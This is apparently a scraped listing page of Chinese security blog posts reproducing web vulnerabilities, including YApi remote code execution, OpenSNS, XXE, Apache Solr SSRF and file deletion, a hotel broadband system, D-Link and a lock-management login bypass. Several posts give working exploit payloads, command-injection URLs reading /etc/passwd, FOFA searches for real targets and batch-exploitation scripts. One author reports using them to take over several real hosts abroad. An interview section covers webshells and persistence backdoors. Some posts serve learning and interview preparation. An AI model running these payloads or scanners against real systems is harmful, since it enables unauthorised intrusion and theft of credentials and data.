Yapi RCE 复现和批量编写 安全文章

Yapi RCE 复现和批量编写

原创稿件征集邮箱:[email protected]:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的稿酬前言一、漏洞复现二、伪shell的编写二、批量脚本 *fofa.pyfofasearch.pyyapi.py总结前言前几天胖白师傅给我们分享了Yapi命令执行漏洞的利用,起因是《腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用》https://baijiahao.baidu.com/s?id=1704695582584267257&wfr=spider&for=pc,可以看到文章发布的时间是7月8号,但是师傅发现该漏洞其实在一月份就已经被爆出,甚至都给出了exp《高级Mock可以获取到系统操作权限》https://github.com/YMFE/yapi/issues/2099然后这两天发现复现文章还蛮多的,但是第一次拿下好几个肉鸡,还是想记录一下感谢胖白师傅的分享,感谢海星姐对脚本的优化一、漏洞复现首先祭出fofa,搜索语句为 app="yapi",但是为了避开国内,所以使用 app="yapi" && country="SG",SG为新加坡,结果如图虽然有30页,但是能利用的可能也没几个,而且 docker 居多顺便记录一下验证 docker 的两个小方法ps -ef :docker 一般显示很少的进程ls -a /.dockerenv点击注册,信息随便填,但是可能会遇到这种情况这是第一道坎,不,第一道坎应该是压根就访问不了,这是第二道坎找了个能注册的,注册完进入如图页面,点击 添加项目添加完项目进入如下页面,继续 添加接口添加完接口进入如下页面,点击 高级Mock将《高级Mock可以获取到系统操作权限》https://github.com/YMFE/yapi/issues/2099中的exp,保存到脚本中,但是这里可能保存不成功,第三道坎const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()回到预览页面,点击下方的链接可以看到命令成功执行了,而且这很大概率不是docker,然后这里有第四道坎,命令可能根本执行不成功,比如 百度yapi二、伪shell的编写一开始只是想写个脚本,快速改Mock脚本,返回执行结果,假装拿到了一个shell# coding=utf-8import jsonimport requestsurl = 'http://ip:port/'r = requests.session()projectID = '131' # http://ip:port/project/131/interface/api/1141interfaceID = '1141' # 131 projectID 1141 interfaceIDheaders = { 'Content-Type': 'application/json'}def login(): data = { "email": "[email protected]", "password": "asd" } rsp = r.post(url + 'api/user/login', data=json.dumps(data), headers=headers) print(rsp.text)def rce(cmd): # 这里做了优化,对全局变量进行修改,需要关闭 ‘高级Mock’ 中的脚本 poc = '''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''.format(cmd) data =...
阅读全文
代码审计 |  opensns代码审计复现 代码审计

代码审计 | opensns代码审计复现

前言申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!本文来自N1cE师傅的投稿,在此表示由衷的感谢。作者寄语:由于本周也是在补天公众号看到了(moonv)这位师傅的代码审计文章https://mp.weixin.qq.com/s/5_HxHEFrCxOCagGOQPOCDw想着复现下无奈只有前部分的poc而已,剩下的只能自己补上了 ,可能会存在点理解误差。(师傅们轻点喷,本人新手文章,耗时一天)正文审计工具:PhpStudy(2016版本)、Phpstorm(2020.3.2版本)审计步骤:由于是thinkphp框架写的,是(应用/控制器/方法名)进行访问的,访问这控制器是 ?s=Weibo/Share/shareBox&query=往下走就是到17行②处,这里将query解码的值传到③sharabox.html页面然后query的值就赋到'param'的参数上面调用Weibo/Share/fetchShare方法。而{:W('Weibo/Share/fetchShare',array('param'=>$parse_array))}的W方法在ThinkPHP/Common/functions.php的1174行。这里可以参考补天师傅发的文。R(方法是远程调用控制器的操作方法 URL 参数格式 控制器/操作{:W(‘Weibo(模块、调用地址)/Share(方法)/fetchShare(操作)’,array(‘param’=>$parse_array))}然后我们继续往回看,也就是sharebox.html远程调用Weibo/Share/fetchShare方法这里。query的值就赋到'param'的参数上面调用Weibo/Share/fetchShare方法。而且D方法只会寻找模块(model)类比如你的参数是query=app=Common%26Model=Schedule%26method=runSchedule%26id就会搜索Common/Model/ScheduleModel的类由于前面的assginFetch方法传入D方法的时候带着‘Weibo/Share’参数所以这里只会搜索weibo模块类Weibo/Model/ShareModel而fetchShare方法里又将值传给assginFetch方法又又传给了getinfo方法。继续往下跟进上面是调用了D方法也就是模块类Weibo/Model/ShareModel这里的getinfo方法会将传过来的参数进行判断,如果app、Model、method参数都不为空的话就进入D进行实例化(实例化:个人感觉是调用方法的意思)如:query=app=应用名(如:Common、Weibo、Admin)%26Model=模块名%26method=方法名,这里moonv师傅已经给出了前部分的poc:query=app=Common%26Model=Schedule%26method=runSchedule%26id这里的调用D方法又成了执行Common/Model/ScheduleModel/runSchedule方法这里是利用了moonv师傅找出的runSchedule方法然后继续调用D方法进行实例化模块。 而且这里的参数是需要三个参数,status、method、args,这里有点小绕脑。而method是需要‘->’进行分割的,根据前部分的poc再加上现在的参数提示可以组成:query=app=Common%26model=Schedule%26method=runSchedule%26id=1%26id=Schedule->_validationFieldItem%26id=这里会将method下标的值带入D方法来实例化该模块(Model)类,然后将②带入①的模块类中。继续往下的话就到了_validationFieldItem方法,这里我也不是很清楚怎么进来的,应该的通过Schedulemodel方法进行执行_validationFieldItem吧。(PS:有懂的师傅能否讲解一下)1、要val下标4的值是function2、要val下标6的值是数组3、args会和data下标是val下标0的值4、要val下标1的值是assert师傅们可以百度参考下call_user_func_array代码执行。解释第3点:如果val=cmd ,那么data就是data这下可以构造出poc:/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id=1%26id=Schedule->_validationFieldItem%26id=function%26=%26id=cmd%26id=assert%26id=cmd=system(whoami)影响版本:目前版本版本:Uploads_Download_2020-05-14_5ebca066a3fef实现步骤:http://127.0.0.1/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id=1%26id=Schedule-%3E_validationFieldItem%26id=function%26=%26id=cmd%26id=assert%26id=cmd=system(ipconfig)如果对你有帮助的话那就长按二维码,关注我们吧!  经验分享 | 渗透笔记之Bypass WAF  什么是HTTP和HTTPS  实战 |  BYPASS安全狗-我也很“异或”右下角求赞求好看,喵~ 本文始发于微信公众号(F12sec):代码审计 | opensns代码审计复现
阅读全文
web漏洞|XXE漏洞复现 安全文章

web漏洞|XXE漏洞复现

docker搜索xxe相关镜像包,然后pull下来,我这里pull的是:rrodrigo/xxelab 镜像包。启动docker环境,映射到VPS的32776端口访问输入注册数据,抓包重放。发现提交数据包采用 xml 格式传递,且邮箱有返回。这里我们引用外部DTD实体,并且将email的值修改为引用外部实体的值 &file;   因为,返回包会返回email的值,所以返回包会读取我们引用的 /etc/passwd 的值返回给我们,造成了任意文件读取。这里指定文件/etc/passwd,用不用file协议均可。<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>利用 base64 编码进行 xxe,防止有返回包验证。返回base64数据包,base64解码之。<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test><root><name>111</name><tel>222</tel><email>&file;</email><password>333</password></root>相关文章:XML和JSON数据格式                 XXE(XML外部实体注入)来源:谢公子的博客责编:Zuo由于文章篇幅较长,请大家耐心。如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465) 本文始发于微信公众号(谢公子学安全):web漏洞|XXE漏洞复现
阅读全文
毕业季 | 渗透测试面试经历分享和题目环境复现 安全闲碎

毕业季 | 渗透测试面试经历分享和题目环境复现

作者:yaunsky,https://github.com/yaunsky/GetOffer。笔者最近参加了很多面试,想通过这个项目将面试的经历和面试官提出的问题分享一下,同时复现一部分面试官的题目环境。这里有很多漏洞环境在网上都有,所以在这里也没有过多的去自个复现(懒得复现了),于是就将大佬们的成果结果面试题目整理了一下。特别感谢vulhub提供的众多渗透测试环境,有兴趣的伙伴们还可以去大佬的项目下膜拜。https://github.com/vulhub/vulhub。经典不变的场景问题:给你一个后台登陆站点,说说你的渗透思路。此类问题一般围绕渗透测试的基本流程展开,不过个人有其他思路也可以,这里笔者主要是为了可以做到条例清晰(后来看看也并不清晰。。。。。。emmmm),让面试官觉得很有逻辑性。当然回答过程中还有面试官提出的其他问题都穿插提问啦。信息搜集whois站长查询查注册人信息,邮箱。主要是可以拿着这些信息通过goole,或github搜索一些其他的敏感信息,扩大搜索面。效果就不多说了,在github泄漏一些账号或源码的事件简直不要太多。查子域名这里不仅仅是只针对这个场景的渗透了。当然有可能子域名下的数据库和正式的用的一样呢,例如测试站点,开发者为了方便利用数据测试,自然而然的采用了正式数据库(这个我遇到过),测试站点的问题理论上比正式上线的会多一些,拿到权限的可能也就越大,这是再到正式的登陆接口测试。(扩散思维)服务器相关信息(真实IP,系统类型、waf、开放端口)问:获取获取真实ip方法,ping方法去ping域名,问:如何判断目标站点使用了CDN,如果目标站点使用了CDN,如何绕过判断真实ip?判断:有条件的使用全国不同地区的服务器ping这个网址,(当然线上也有工具!)如果得到的ip结果不同,即可判断使用了CDN。绕过:查询域名解析记录;使用国外服务器ping,因为国内很少对国外做CDN。当然还可以使用nslookup,dns服务器地址尽量找冷门的,热门的会和国内查询的结果相同。Nmap 扫描,探测当前服务器是否开放了其他端口,如果其他端口存在历史遗留漏洞,可以直接利用。nmap扫描服务器进行搜集,我认为也是至关重要的一点,不能遗漏。问:nmap默认以什么方式探测ping方式问:如何使用禁ping的方式扫描-p0漏洞挖掘对应下面的一些列渗透环境请点击https://github.com/yaunsky/Iproject/tree/master/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/一个登陆站点可能存在的漏洞:sql注入、万能密码(sql注入)、弱口令,敏感信息泄漏,csrf,url跳转,xss,命令执行,越权访问,未授权访问,短信轰炸sql注入问:注入类别get、post、cookie、盲注sqlmap的使用方法问:获得当前数据库使用的用户—current-user问:post注入方法、cookie注入方法。抓包,放到txt文件,使用sqlmap -r *.txt实现post注入cookie注入,--cookie .. —level 2使用文件时,制定某特定选项注入的方法在文件中,将指定的参数值设为星号(*)risk级别、level级别risk 1-3level 1-5默认都是1.测试cookie注入时最低level为2文件上传绕过的方式有哪些前端验证绕过,网站指纹识别,中间件识别1、常见的cms漏洞2、weblogic、nginx、iis、apache问:weblogic你知道那些漏洞类似问题尽量答新一点的或经典的(我认为这样面试官会觉得你关注最新的安全事件),任意文件上传。又问:有哪些限制呢?用户名和密码设置web测试问:谈一谈nginx、iis和apache解析漏洞nginx解析:从右往左解析iis解析漏洞:通过;绕过apache解析:将jpg文件当作执行文件解析提权或拿shellmysql写shell问:拥有数据库的访问权限如何写shellunion select 写入问:还有其他的吗?不会,肯定是有的问:如果你拥有一个sa用户,如何写shell1、通过sa权限回复xp_cmdshell2、查网站真实路径3、写入shell问:sql server和oracal默认端口1433 1521 mysql3306问:phpmyadmin下如何写shell1、查询是否开启日志记录,没有则开启show global variables like "genera";2、设置日志保存地址(前提得到网站真实路径)3、select "shell"这样就写进了日志,菜刀连日志文件即可或者1、创建一个表,设置一个字段2、将字段内容为一句话3、查询表的内容,倒入到php文件4、菜刀连接php文件或者1、直接通过select 一句话 into outfile "PHP文件路径"2、连接一句话问:mysql获得shell的时候,有哪些限制条件GOP关闭Secure-file-priv没有配置root权限有绝对路径udf提权利用root权限,创建带有调用cmd函数的udf.dll文件,然后可以直接输入cmdlinux提权方式1、利用内核漏洞提权脏牛2、sudo提权3、数据库提权4、suid提权ssrf结合redis获得shell使用ssrf探测内网是否开放了6379端口(对应redis服务),如果开放,即可结合redis未授权漏洞,通过gopher协议写入shell。又问:redis未授权都有哪几种方式获得shell?1、直接写shell到网站的真实路径下,当然必须知道网站真实目录2、将密钥写入.ssh/目录下3、写计划任务4、主从rce又问:执行写shell的操作时,应该具备哪些条件。1、未授权访问2、redis命令没有禁止,例如config禁用命令的使用去找redis.conf。里面的security项rename-command CONFIG ""又问:如果内容禁止使用ip如何探测内网端口1、使用dns解析2、127。0。0。13、http://:80/4、进制转换权限维持windows方法1、shift后门将自己的cmd.exe替换掉C'windowssystem32dllcachesethc.exe在开机后未登陆情况下按5下shift执行后门。2、计划任务没研究过linux方法1、ssh后门2、suid后门3、inetd服务后门4、vim后门MSF权限维持1、persistence模块2、metsvc模块powershell权限维持资料查的,暂未研究,不过面试官有时侯也会挺喜欢问这些。挖洞过程中,你觉得挖到最有意思的漏洞阿里积分活动ueditor的ssrf漏洞内网渗透知识域控域控hash文件存放位置C:WindowsNTDSNTDS.dit内网信息搜集查看域:new user /domain看共享:net view看hosts文件:可能通过这个文件进行ip-域名解析浏览器中记录的密码敏感文件服务器中的配置文件历史命令ssh私钥xshell中的session文件,可导出工具扫描:msf ms17010应急响应应急如何查找挖矿Netstat -anp查异常pid看端口信息,然后根据端口信息定位文件 ls -l /proc/PID服务器入侵报警的怎么做?自写的脚本,实现的功能:查登陆日志(成功与失败)、查规定时间内修改的文件、查最新添加的文件、查历史命令,查异常进程、查/etc/passwd、查各服务的最新日志(每天的日志都会备份一份到指定文件夹下)。脚本去见笔者另一公开内容。自写渗透方面的工具有就解释,没有拉到。建议多写写渗透相关的工具或脚本,加分很多SRC提交优质漏洞有就解释,没有拉到,贼加分!文章中很多漏洞没有给出漏洞地址,但在网上都有。大家去百度一下吧,后期没心情整理啦,要去看小姐姐了。还要提醒一下看到这个内容的伙伴,以上内容大多都是基础问题,个人整理,不会保证完全会吻合面试官的内容(我也没那么厉害),同时如有错误的地方,希望能够给指出,毕竟是菜鹅笔者手打的。见谅见谅。最后祝每一个找工作的小伙伴顺利拿到offer。对面试题的文章进行了整理,有需要的师傅可以公众号后台回复“面试题”获取一如既往的学习,一如既往的整理,一如即往的分享。感谢支持“如侵权请私聊公众号删文”关注LemonSec觉得不错点个“赞”、“在看”哦 本文始发于微信公众号(LemonSec):毕业季 | 渗透测试面试经历分享和题目环境复现
阅读全文
CVE-2021-35042Django SQL注入漏洞复现 安全文章

CVE-2021-35042Django SQL注入漏洞复现

漏洞描述  Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。组件介绍Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。综合评价   高危,最终造成服务器敏感信息泄露影响版本Django 3.2Django 3.1安全版本Django >= 3.2.5Django >= 3.1.13漏洞复现搭建环境https://github.com/YouGina/CVE-2021-35042运行(这里为了方便可以提前切换到root用户)git clone https://github.com/YouGina/CVE-2021-35042.gitcd CVE-2021-35042初始设置./setup.sh #./setup.sh执行之后,docker开启的是数据库服务器在这一步运行过程中会出现下面这个错误,这个意思是不要以root用户执行,以普通用户即可,不用理会这个报错;此时数据库服务已经开启接着把web服务也开启docker-compose up -d #此时web服务器和数据库服务器均开启 进入web服务容器中docker exec -it {container_id} /bin/bash #进入web服务器执行下面这两条命令python manage.py makemigrations cve202135042红线框中表示在cve202135042应用目录下的migations的文件下多了一个0001_initial.py的文件,查看这个文件内容,表示我们创建了一个User这个模型类,并且指出这个类的成员属性id,name,以及他们的属性,同时我们了解到djnago在models.py创建模型类,其中一个模型类对应的是一张数据表,但是该命令并没有作用到数据库,这个命令中python manage.py makemigrations是记录我们对models.py的所有改动,并且将这个改动迁移到migrations这个文件下生成一个文件0001_initial.py。 接着执行下面这条命令, 这条命令的主要作用就是把上一条的改动作用到数据库也就是执行migrations里面新改动的迁移文件来更新数据库,比如创建数据表,或者增加字段属性python manage.py migrate打开以下 URL 以加载示例数据:http://localhost:8000/load_example_data然后转到易受攻击的页面http://localhost:8000/users/漏洞防御及时更新到最新版本链接 : https://www.djangoproject.com/weblog/2021/jul/01/security-releases/这个漏洞复现因为网络环境问题卡了好久,这里感谢zly师兄的指点,这家伙搭环境比我快多了>_< 本文始发于微信公众号(亿人安全):CVE-2021-35042Django SQL注入漏洞复现
阅读全文
Apache Solr SSRF (CVE-2021-27905)复现 安全文章

Apache Solr SSRF (CVE-2021-27905)复现

0x00漏洞概述Apache solr是一个开源的搜索服务,使用java编写,运行在serblet容器的一个独立的全文搜索服务器,是apache luncene项目的开源企业搜索平台。0x01影响范围Apache solr <=8.8.2 0x02漏洞复现1、本次复现使用的是apache solr8.8.1版本,下载完成后解压进入bin目录,执行:  Solr start -p 8983 //启动环境(下载链接:http://archive.apache.org/dist/lucene/solr/8.8.1/)    2、点击Core Admin创建core发现报错  此时solr在server/solr目录下已经创建了名字new_core的文件夹,我们把server/solr/configsets/default文件夹下的conf文件复制到新建的new_core文件下:      此时即可创建成功;访问http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json,便可以看到core的名字: 3、SSRF数据包(其中core为实际节点的core值,dnslog为Dnslog的地址):GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1Host: IPAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Referer: http://IP/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close4、POC复现:POC:# CVE-2021-27905# Apache solr ssrfimport requestsimport urllib3import jsonimport sys, getopturllib3.disable_warnings()def title(): print("") print("") print("") print("") print("") print("")def commit(): url = "" try: opt, agrs = getopt.getopt(sys.argv, "hu:d:", ) for op, value in opt: if op == "-h" or op == "--help": print(""" Apache Solr SSRF漏洞 (CVE-2021-27905) Options: -h or --help : 方法说明 -u or --url : 站点URL地址 -d or --dnslog : DnsLog """) sys.exit(0) elif op ==...
阅读全文
Apache Solr <= 8.8.2任意文件删除漏洞复现 安全文章

Apache Solr <= 8.8.2任意文件删除漏洞复现

上方蓝色字体关注我们,一起学安全!作者:🐟@Timeline Sec本文字数:949阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。0x02 漏洞概述这是个"任意"文件删除漏洞, 可以删除 Files.delete() 能删的任何文件。0x03 影响版本Solr <= 8.8.20x04 环境搭建1、先在官网上下个 8.8.2 的 Solr 的安装包, 我这里为了方便就装个 Windows 版的https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.8.2/2、开一个有 core 的实例, 我这里用的是 DataImportHandler 的范例配置,进入bin目录下执行solr.cmd -e dih访问:http://IP:8983/solr/#/0x05 漏洞复现1、在C盘下新建一个test.txt2、向任意 core 的 config API 发送一个 POST 包,例如 /solr/db/config 或者 /solr/solr/config 之类的{ "add-requesthandler": { "name": "/test1", // 这里填 RequestHandler 的路径 "class":"solr.PingRequestHandler", "healthcheckFile":"../../../../../../../../../../../../../Windows/Temp/test.txt", }}2、访问http://172.16.255.2:8983/solr/db/config/overlay?omitHeader=true检查是否创建成功3、向之前发送包的 config API 发送一个 GET 请求, 参数为action=DISABLE 例如:/solr/db/test1?action=DISABLE这时会删除之前设置的文件, 同理 action=ENABLE 会生成之前设置的同名文件, 里面写的是一串 healthcheck 信息. 注意 /test 是之前设置过的路径0x06 漏洞分析很明显这个漏洞源自于 PingRequestHandler, 当一个 Config API POST 请求被提交之后, Solr 先是执行 handlePOST 函数, 经过一堆 load 和 get 之后会初始化一个 PingRequestHandler public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception { ... if ("POST".equals(httpMethod)) { ... try { command.handlePOST(); } ... }...
阅读全文
漏洞复现-酒店宽带运营系统RCE 安全文章

漏洞复现-酒店宽带运营系统RCE

免责声明:由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!FOFA语句:title="酒店宽带运营"POC:http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1脚本代码:def poc(url): print("-"*50) print("开始检测: "+url) target = url+"/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1" r = requests.get(url=target,timeout=8,verify=False) if r.status_code ==200 and "parent.doTestResult" in r.text: print(url+" 漏洞存在!") print("请访问:"+url+"/Test.txt") print("-"*50) print("n") else: print(url+" 漏洞不存在!") print("-"*50) print("n")利用截图:支持批量检测!利用说明:检测成功后,若存在漏洞,会向Test.txt文件写入cat /etc/passwd的内容,访问url/Test.txt即可访问到内容!回复:酒店宽带运营系统RCE 即可获取脚本! 本文始发于微信公众号(Fight Tigers Team):漏洞复现-酒店宽带运营系统RCE
阅读全文
漏洞复现-某路由器账号密码泄露 安全文章

漏洞复现-某路由器账号密码泄露

免责声明:由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!漏洞简介:D-Link 成立于 1986 年,创立至今三十年,凭借其完整多元的产品线以及优异且屡获国际奖项肯定的网络产品和服务,友讯科技已然成为年营收总值超过十亿美元的国际知名企业。 D-Link 在快速、竞争和不断发展的环境中,将持续提供高效能的网络解决方案协助消费者及各类型企业用户。近期网上爆出D-Link-Dir设备存在账号密码泄露漏洞!FOFA语句:app="D_Link-DIR-868L" 漏洞POC:POST /getcfg.php HTTP/1.1Host: xxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: uid=XFOB50sMqSUpgrade-Insecure-Requests: 1Content-Type:application/x-www-form-urlencodedContent-Length: 61SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1利用截图:脚本使用:获取脚本回复: DLink-DIR 本文始发于微信公众号(Fight Tigers Team):漏洞复现-某路由器账号密码泄露
阅读全文
微软MS10-087漏洞的复现+明天咱抽奖预告 安全文章

微软MS10-087漏洞的复现+明天咱抽奖预告

0x00 前言这是我对微软MS10-087漏洞的利用的学习记录。并对其进行复现,不喜勿喷。0x01 环境1.目标机环境:winx3pen metasploit(目标靶机在网上能够找到哦)2. 攻击机环境kali2020.2vmware        攻击机IP:192.168.1.100被攻击机IP:192.168.1.128开启msfconsole查找和MS10-087相关的模块进入攻击模块 加载模块,设置所使用的payload显示需要配置的选项,打开计算器设置攻击目标,exploit运行PAYLOAD这篇文,是小兄弟写的复现文,可以参考,大佬勿喷明天开始抽奖,抽书,记得给我设置个星标,今天先水一波。静等明天到来,小号我早通知了。记得关注我小号,获取最新消息,啊哈哈哈 本文始发于微信公众号(渗透云笔记):微软MS10-087漏洞的复现+明天咱抽奖预告
阅读全文
漏洞复现-某系统0day 安全文章

漏洞复现-某系统0day

免责声明:由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录! 漏洞简介:江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。复现原理:在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。复现过程:首先fofa一个系统,大概长下面这样:尝试弱口令登录(admin/123456):这里注意到登录成功的返回包里似乎都是固定值,并没有随机的cookie产生,所以直接尝试把这个正确的返回包去替换其他网站的登陆包:看到下面的登录是账号密码错误:在登录的时候直接抓包替换返回包:替换下面的数据为:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Sat, 05 Jun 2021 01:36:06 GMTConnection: closeContent-Length: 10放包后登录成功:经过测试发现,可以通杀2.0版本。 本文始发于微信公众号(Fight Tigers Team):漏洞复现-某系统0day
阅读全文